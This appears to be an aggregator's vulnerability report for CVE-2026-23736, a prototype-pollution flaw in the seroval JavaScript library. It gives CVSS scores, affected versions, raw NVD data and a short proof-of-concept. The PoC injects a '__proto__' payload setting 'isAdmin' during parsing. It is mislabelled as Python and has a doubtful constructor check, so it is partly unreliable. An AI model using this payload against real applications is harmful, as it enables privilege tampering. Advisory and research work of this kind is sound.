Security Vulnerability Report
中文
CVE-2026-23736 CVSS 7.3 HIGH

CVE-2026-23736

Published: 2026-01-21 23:15:52
Last Modified: 2026-02-27 19:36:51
Source: [email protected]

Description

seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, due to improper input validation, a malicious object key can lead to prototype pollution during JSON deserialization. This vulnerability affects only JSON deserialization functionality. This issue is fixed in version 1.4.1.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:lxsmnsyc:seroval:*:*:*:*:*:node.js:*:* - VULNERABLE
seroval <= 1.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import { parse } from 'seroval'; // Malicious JSON payload that triggers prototype pollution const maliciousPayload = JSON.stringify({ "__proto__": { "isAdmin": true, "polluted": "prototype pollution successful" } }); try { // Parse the malicious JSON - this triggers prototype pollution const result = parse(maliciousPayload); console.log('Parsed result:', result); // Verify prototype pollution console.log('Pollution check:', Object.prototype.polluted); // Check if any plain object is affected const testObj = {}; console.log('Test object polluted:', testObj.polluted); console.log('Test object isAdmin:', testObj.isAdmin); } catch (e) { console.error('Parse error:', e.message); } // Another exploitation vector with constructor pollution const constructorPayload = JSON.stringify({ "constructor": { "prototype": { "exec": "malicious_code" } } }); const result2 = parse(constructorPayload); console.log('Constructor pollution:', Object.constructor.prototype.exec);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23736", "sourceIdentifier": "[email protected]", "published": "2026-01-21T23:15:52.340", "lastModified": "2026-02-27T19:36:50.543", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, due to improper input validation, a malicious object key can lead to prototype pollution during JSON deserialization. This vulnerability affects only JSON deserialization functionality. This issue is fixed in version 1.4.1."}, {"lang": "es", "value": "seroval facilita la serialización de valores JS, incluyendo estructuras complejas más allá de las capacidades de JSON.stringify. En las versiones 1.4.0 y anteriores, debido a una validación de entrada inadecuada, una clave de objeto maliciosa puede conducir a la contaminación de prototipos durante la deserialización JSON. Esta vulnerabilidad afecta solo a la funcionalidad de deserialización JSON. Este problema se ha solucionado en la versión 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lxsmnsyc:seroval:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.4.1", "matchCriteriaId": "85760E40-9AB1-40EB-98A1-D1A4411AAFC5"}]}]}], "references": [{"url": "https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hj76-42vx-jwp4", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.